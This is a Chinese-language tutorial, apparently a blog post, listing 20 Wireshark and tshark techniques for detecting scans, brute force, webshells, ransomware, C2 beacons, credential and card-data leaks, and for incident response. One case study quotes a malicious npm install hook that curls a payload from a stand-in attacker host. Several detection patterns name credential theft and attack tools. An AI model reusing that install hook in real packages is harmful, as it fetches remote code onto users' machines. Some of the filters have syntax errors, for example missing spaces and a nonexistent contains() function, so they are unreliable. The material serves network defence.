20个Wireshark在网络安全分析中的实战技巧

一、基础配置篇

1. 1. 安全捕获环境搭建

# 创建隔离分析环境
sudo ip linkset eth0 promisc on
sudo tcpdump -i eth0 -s 0 -w /mnt/isolated/evidence.pcap

1. 2. 预置过滤模板

# 高危协议快速过滤
tcp.port in {135,139,445,3389} || udp.port in {53,123,161,500,4500}

1. 3. 关键字段标记

• • 右键点击IP → Apply as Column
• • 将TTL异常值设为显眼红色（TTL<64 or TTL>128）

二、攻击检测篇

1. 4. 扫描行为识别

# SYN扫描检测
tcp.flags.syn==1and tcp.flags.ack==0and tcp.window_size <=1024

1. 5. 暴力破解捕获

# SSH爆破特征
tcp.port==22and (tcp.flags.reset==1or tcp.analysis.retransmission)

1. 6. DNS隐蔽隧道

# 检测长域名请求
dns and frame.len > 256 && !contains(dns.qry.name,".google.")

1. 7. WebShell通信特征

http.content_type=="application/octet-stream" 
&& http.request.method=="POST"
&& frame.len >1024

1. 8. 勒索软件通信

tcp contains "GET /decrypt_instructions"
|| tls.handshake.extensions_server_name=="lockbit"

三、数据泄露监控

1. 9. 信用卡外泄检测

frame matches "\b[3456]\d{3}[ -]?\d{4}[ -]?\d{4}[ -]?\d{4}\b"

1. 10. 数据库拖库行为

mysql.query contains "SELECT" 
&& frame.len >1500
&& tcp.srcport==3306

1. 11. 云凭据泄露

http.request.uri contains "?AccessKeyId="
|| tls contains "AKIA"

四、高级威胁狩猎

1. 12. Cobalt Strike检测

# Beacon心跳包特征
tcp.payload matches "\x00\x00\x00..\xff\xff\xff"
&& tcp.len between 20and50

1. 13. Metasploit载荷识别

http contains "Meterpreter"
|| tcp contains "core_loadlib"

1. 14. 域渗透横向移动

smb || kerberos 
&& (ip.src==<域控IP>or ip.dst==<域控IP>)

1. 15. 内存攻击特征

tcp contains "\x90\x90\x90"# NOP sled检测
|| http contains ".dll"

五、加密流量分析

1. 16. TLS指纹识别

# 检测恶意JA3指纹
tls.handshake.ja3 contains "6734f37431670b3ab4292b8f60f29984"

1. 17. 证书异常检测

tls.handshake.certificate 
&& (x509sat.uTF8String == "Phishing Ltd" 
|| x509ce.dNSName == "freevpn.malicious.ru")

六、应急响应实战

1. 18. 攻击时间轴重建

tshark -r attack.pcap -T fields -e frame.time 
-e ip.src -e ip.dst -e tcp.port > timeline.csv

1. 19. 恶意文件提取

# 从HTTP流量中提取PE文件
tshark -r infection.pcap --export-object http,./malware

1. 20. 攻击者画像生成

# 提取攻击链关键信息
echo"=== C2服务器 ==="
tshark -r c2.pcap -Y "dns" -T fields -e dns.qry.name

echo"=== 用户代理 ==="
tshark -r c2.pcap -Y "http.user_agent" -T fields -e http.user_agent

七、法律合规要点

• • 取证规范：全程使用editcap保留原始时间戳
• • 哈希校验：sha256sum evidence.pcap > chain_of_custody.txt
• • 隐私过滤：使用tcprewrite匿名化用户数据

tcprewrite --infile=raw.pcap --outfile=anon.pcap 
--dstipmap=192.168.1.0/24:10.0.0.0/24

八、真实攻击案例分析

案例1：供应链攻击溯源

1. 1. 捕获异常NPM包更新请求：

HTTP/1.1200 OK
Content-Type: application/json
{"version":"1.2.3","scripts":{"install":"curl http://mal-registry.com/payload.sh"}}

1. 2. 追踪关联IP：

tshark -r breach.pcap -Y "ip.addr==203.0.113.5" -z conv,ip

案例2：金融木马通信解密

1. 1. 提取恶意DLL中的RC4密钥
2. 2. Wireshark配置协议解密：

Protocols -> TLS -> (Pre)-Master-Secret log: /path/to/keys.log

九、高阶技巧拓展

• • 流量基线比对：使用capinfos建立正常流量指纹

capinfos -Tm -r baseline.pcap > baseline_profile.txt

• • AI辅助分析：集成Suricata告警日志

tshark -r traffic.pcap -Y "frame.comment contains 'ET PHISHING'"

• • 工控协议解析：自定义Modbus/TCP解析器

dissector_add_uint("tcp.port", 502, modbus_handle);

十、重要提醒

1. 1. 三层验证原则：流量特征+行为模式+外部情报
2. 2. 避免分析陷阱：
• • 勿将CDN IP误判为攻击源
• • 识别合法的云服务通信（如AWS metadata）
3. 3. 持续更新知识库：
• • 每日更新GeoIP2数据库
• • 订阅威胁情报Feeds

某次金融攻防演练中，攻击者使用域前置技术隐藏C2通信。防守方通过Wireshark发现异常：

HTTP/2200 OK  
:authority: legit-cdn.com
x-amz-cf-pop: SIN2-C1 # 新加坡节点

但TLS证书却显示：

x509ce.dNSName: c2-malicious.tk

正是这0.5秒的协议解析差异，阻止了千万级资金损失

附：分析师必备过滤库

# 内网横向移动检测
smb || ldap || winrm || wmi

# 加密挖矿特征
tcp contains "stratum+tcp"
|| http contains "xmr"

# 钓鱼页面识别
http contains "login"
&& http contains "password"
&& !(http.host contains "corp")

当0day攻击发生时，EDR可能沉默、防火墙可能失效，但流过网卡的数据包永远是最诚实的证人。掌握这20项核心技能，意味着你拥有了穿透网络迷雾的终极武器。